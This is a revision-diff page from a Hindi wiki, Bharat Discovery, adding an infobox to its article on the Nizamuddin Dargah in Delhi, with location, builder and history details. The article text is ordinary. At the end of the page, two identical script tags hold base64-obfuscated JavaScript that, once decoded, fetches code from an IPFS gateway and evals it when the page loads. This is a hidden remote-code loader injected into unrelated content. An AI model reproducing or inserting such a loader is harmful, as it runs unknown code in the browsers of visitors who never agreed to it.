Difference between revisions of "निज़ामुद्दीन दरगाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Hazrat-Nizamuddin-Dargah.jpg|thumb|निज़ामुद्दीन औलिया की दरगाह|250px]]
+
{{सूचना बक्सा धार्मिक स्थल
 +
|चित्र=Hazrat-Nizamuddin-Dargah.jpg
 +
|चित्र का नाम=निज़ामुद्दीन औलिया की दरगाह
 +
|विवरण=यह दरगाह [[दिल्ली]]-[[मथुरा]] मार्ग पर [[हुमायूँ का मक़बरा|हुमायूँ के मक़बरे]] के पास स्थित है।
 +
|स्थान=[[दिल्ली]]
 +
|भौगोलिक स्थिति=उत्तर- 28° 35′ 28.7″, पूर्व- 77° 14′ 30.5″
 +
|निर्माता=[[मुहम्मद तुग़लक़]]
 +
|जीर्णोद्धारक=
 +
|निर्माण काल=14वीं शताब्दी
 +
|वास्तुकला=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?saddr=Nizamuddin+Railway+Station,+Nizamuddin,+New+Delhi,+Delhi&daddr=Hazrat+Nizamuddin+Auliya+Dargah,+New+Delhi,+Delhi&hl=en&ll=28.59138,77.248306&spn=0.01918,0.042272&sll=28.590777,77.251482&sspn=0.01918,0.042272&geocode=Fa41tAEdFc6aBCHm4DSNjur-JCk3BmzhDuMMOTHm4DSNjur-JA%3BFT5FtAEdp52aBCHo76iWPbDgeSmjfChVHeMMOTHo76iWPbDgeQ&oq=Nizamuddin+dar&mra=ls&t=m&z=15&iwloc=ddw1 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= [[शाहजहाँ]] की पुत्री और [[औरंगजेब]] की बहन [[जहाँआरा बेगम]] की क़ब्र भी मक़बरे के पास है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
[[निज़ामुद्दीन औलिया|संत निज़ामुद्दीन औलिया]] की दरगाह [[दिल्ली]]-[[मथुरा]] मार्ग पर [[हुमायूँ का मक़बरा|हुमायूँ के मक़बरे]] के पास स्थित है।
 
[[निज़ामुद्दीन औलिया|संत निज़ामुद्दीन औलिया]] की दरगाह [[दिल्ली]]-[[मथुरा]] मार्ग पर [[हुमायूँ का मक़बरा|हुमायूँ के मक़बरे]] के पास स्थित है।
*इस तीर्थ स्थान के केन्द्रीय कक्ष में पीर निज़ामुद्दीन को दफ़नाया हुआ है, इसे [[मुहम्मद तुग़लक़]] ने (सन 1324-1351 ई0) में बनवाया था।
+
*इस तीर्थ स्थान के केन्द्रीय कक्ष में पीर निज़ामुद्दीन को दफ़नाया हुआ है, इसे [[मुहम्मद तुग़लक़]] ने (सन 1324-1351 ई.) में बनवाया था।
 
*यह सुन्दर मक़बरा संगमरमर का बना हुआ है जिसके ऊपर [[सफ़ेद रंग|सफ़ेद]] संगमरमर के पत्थरों का जालीदार आवरण है जिसके बाहर चारों ओर सफ़ेद संगमरमर का महराबों वाला एक बरामदा बना हुआ है।  
 
*यह सुन्दर मक़बरा संगमरमर का बना हुआ है जिसके ऊपर [[सफ़ेद रंग|सफ़ेद]] संगमरमर के पत्थरों का जालीदार आवरण है जिसके बाहर चारों ओर सफ़ेद संगमरमर का महराबों वाला एक बरामदा बना हुआ है।  
 
*दरगाह में घुसते ही तालाब है। इसे पीर निज़ामुद्दीन ने स्वयं बनवाया था। [[शाहजहाँ]] की पुत्री और [[औरंगजेब]] की बहन [[जहाँआरा बेगम]] की क़ब्र भी मक़बरे के पास है।  
 
*दरगाह में घुसते ही तालाब है। इसे पीर निज़ामुद्दीन ने स्वयं बनवाया था। [[शाहजहाँ]] की पुत्री और [[औरंगजेब]] की बहन [[जहाँआरा बेगम]] की क़ब्र भी मक़बरे के पास है।  

Revision as of 12:15, 18 May 2013

nizamuddin daragah
vivaran yah daragah dilli-mathura marg par humayooan ke maqabare ke pas sthit hai.
sthan dilli
bhaugolik sthiti uttar- 28° 35′ 28.7″, poorv- 77° 14′ 30.5″
nirmata muhammad tugalaq
nirman kal 14vian shatabdi
chitr:Map-icon.gif googal manachitr
any janakari shahajahaan ki putri aur aurangajeb ki bahan jahaanara begam ki qabr bhi maqabare ke pas hai.

sant nizamuddin auliya ki daragah dilli-mathura marg par humayooan ke maqabare ke pas sthit hai.

  • is tirth sthan ke kendriy kaksh mean pir nizamuddin ko dafanaya hua hai, ise muhammad tugalaq ne (san 1324-1351 ee.) mean banavaya tha.
  • yah sundar maqabara sangamaramar ka bana hua hai jisake oopar safed sangamaramar ke pattharoan ka jalidar avaran hai jisake bahar charoan or safed sangamaramar ka maharaboan vala ek baramada bana hua hai.
  • daragah mean ghusate hi talab hai. ise pir nizamuddin ne svayan banavaya tha. shahajahaan ki putri aur aurangajeb ki bahan jahaanara begam ki qabr bhi maqabare ke pas hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>